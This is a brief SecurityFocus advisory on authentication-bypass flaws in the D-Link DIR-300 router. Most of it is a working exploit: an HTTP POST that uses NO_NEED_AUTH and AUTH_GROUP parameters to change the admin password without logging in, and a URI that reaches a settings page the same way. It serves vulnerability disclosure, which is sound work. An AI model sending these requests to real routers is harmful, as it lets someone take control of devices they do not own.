D-Link DIR-300 Multiple Security Bypass Vulnerabilities

An attacker can exploit these issues by using readily available network utilities.

The following sample HTTP POST request and a URI is available:

POST http://www.example.com:80/tools_admin.php HTTP/1.1
Host: www.example.com
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh


http://www.example.com/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0


 

Privacy Statement
Copyright 2010, SecurityFocus